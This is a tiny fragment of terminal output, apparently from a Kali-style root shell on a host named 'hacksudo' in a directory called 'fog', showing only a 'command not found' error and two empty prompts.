 bash: c: command not found
 ┌──(root💀hacksudo)-[~/fog]
 └─#
 ┌──(root💀hacksudo)-[~/fog]
 └─#